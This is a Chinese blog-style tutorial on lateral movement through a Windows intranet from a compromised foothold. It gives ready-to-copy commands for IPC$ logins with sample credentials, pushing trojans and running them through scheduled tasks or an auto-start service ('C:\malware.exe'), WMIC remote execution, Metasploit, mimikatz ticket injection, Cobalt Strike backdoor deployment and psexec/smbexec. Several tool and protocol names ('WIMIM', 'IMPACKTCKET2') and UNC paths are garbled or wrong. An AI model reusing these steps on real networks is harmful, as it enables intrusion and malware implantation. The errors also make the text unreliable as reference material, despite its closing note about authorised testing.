目录
在网络安全的复杂领域中,横向移动是一项关键技术,当具备一定条件后,如何实施横向移动成为重要话题。
一、横向移动概念阐释
横向移动意味着在获取一台跳板机并且掌握内网相关信息后,基于跳板机所处网段,对同网段或相关内网网站网段中的其他主机发起攻击,例如从 192.168.1.1 向 192.168.1.2 等主机进行渗透攻击。
二、横向移动方法及操作说明
(一)利用 Windows 文件共享服务 IPC
- 建立 IPC 连接
- 操作步骤:在命令提示符下,使用“net use \目标 IP\ipc$ "密码" /user:"用户名"”命令来建立与目标主机的 IPC 连接。例如,如果目标主机 IP 为 192.168.1.10,用户名是 admin,密码是 123456,则输入“net use \192.168.1.10\ipc$ "123456" /user:"admin"”。
- 控制文件系统和执行命令:连接成功后,可以使用“copy 本地文件路径 \目标 IP\共享目录”命令将本地文件拷贝到目标主机的共享目录中,实现文件传输。执行命令可以通过“net use \目标 IP\ipc$ "密码" /user:"用户名" && 命令”的方式,比如“net use \192.168.1.10\ipc$ "123456" /user:"admin" && dir”来查看目标主机上的目录列表。
- 配合计划任务:
- 使用“at \目标 IP 时间 命令”(适用于旧系统)或“Schtasks /create /s 目标 IP /tn 任务名 /tr 命令 /sc once /st 时间”(适用于新系统)来创建计划任务。例如,“at \192.168.1.10 15:00 c:\test.exe”(在 15:00 执行 c:\test.exe 程序)。通过 IPC 服务先将木马文件拷贝到目标主机合适位置,再设置计划任务让木马文件启动上线。
(二)IPC 加 SC 方式
- SC 注册服务操作
- 首先,通过 IPC 连接到目标主机后,在本地计算机上打开命令提示符,输入“sc \目标 IP create 服务名 binPath= "木马文件路径或可执行文件路径" start= auto”来在目标主机上注册服务。例如,“sc \192.168.1.10 create testService binPath= "C:\malware.exe" start= auto”。
- 然后使用“sc \目标 IP start 服务名”来启动服务,从而实现对目标机器的远程控制和横向移动上线。
(三)WMIC
- 远程命令执行操作
- 在本地命令提示符下输入“wmic /node:目标 IP /user:用户名 /password:密码 process call create "命令"”来执行远程命令。例如,“wmic /node:192.168.1.20 /user:administrator /password:abc123 process call create "calc.exe"”来在目标主机上启动计算器程序,以此达到上线效果。
(四)利用相关协议和工具
- WIMIM 协议远程上线
- 首先要确保目标主机支持 WIMIM 协议相关服务且防火墙未阻拦相关端口。使用专门的工具(如一些网络安全测试套件中的工具),配置目标 IP 等参数,发起连接请求。根据工具的提示进行操作,一般需要输入认证信息(如果有),成功连接后即可实现远程上线,为横向移动做准备。
- 外置工具如 msf 进行横向移动攻击
- 启动 msfconsole,配置相关参数:
- 使用“search 相关模块名称”查找适合的横向移动模块,比如“search windows/smb”。
- 然后使用“use 模块名”选择模块,接着“set RHOST 目标 IP”“set LHOST 本地 IP”等设置参数。最后输入“exploit”进行攻击。在攻击过程中,可以利用模块中的功能,如获取目标主机的文件信息、执行特定命令等实现横向移动。
- 启动 msfconsole,配置相关参数:
- PTS 攻击、票据攻击等操作(以票据攻击为例)
- 首先要获取相关票据信息,比如使用 mimikatz 等工具从域控中提取票据。然后通过工具将票据传递到目标主机,利用目标主机对票据的认证机制,实现权限提升和横向移动。在使用 mimikatz 时,输入相关命令如“kerberos::ptt 票据内容”来导入票据。
- 远程桌面连接(RDP)
- 知道目标主机的 IP 地址、用户名和密码后,在本地计算机上打开“远程桌面连接”程序,输入目标 IP,点击连接后输入用户名和密码登录到目标主机。登录成功后,可以进行文件传输、执行命令等操作实现横向移动。
- Cobalt Strike
- 在 Cobalt Strike 客户端中,配置好团队服务器信息后,创建监听。然后生成后门文件,通过前面提到的 IPC 连接等方式将后门文件传输到目标主机并运行。之后在监听界面就能看到目标主机上线,可以进行各种指令操作实现横向移动,如获取系统信息、上传下载文件等。
- Python 脚本工具
- PSEXEC:下载 PSEXEC 工具后,在命令提示符下输入“psexec \目标 IP -u 用户名 -p 密码 命令”来在目标主机上执行命令。例如“psexec \192.168.1.30 -u admin -p 123456 cmd.exe”来打开目标主机的命令提示符窗口。
- SMBEXEC:同样在命令行中使用,输入“smbexec.py 目标 IP 用户名:密码”,可以实现类似的远程命令执行和文件操作功能,助力横向移动。
- Python 的套件 IMPACKTCKET2
- 首先安装 IMPACKTCKET2 套件,然后根据文档和示例代码编写脚本。例如,创建一个连接到目标主机的 socket 连接,发送特制的数据包来获取目标主机的信息或者执行特定操作。通过不断尝试和调整脚本中的参数,实现如获取目标主机的网络配置信息、进行端口扫描等功能,为横向移动提供信息支持和突破口。
在进行横向移动操作时,务必在合法授权的环境下进行测试和研究,以避免违反法律法规和造成不必要的安全风险。同时,网络安全防护技术在不断发展,需要持续学习和探索新的应对方法。

350

被折叠的 条评论
为什么被折叠?



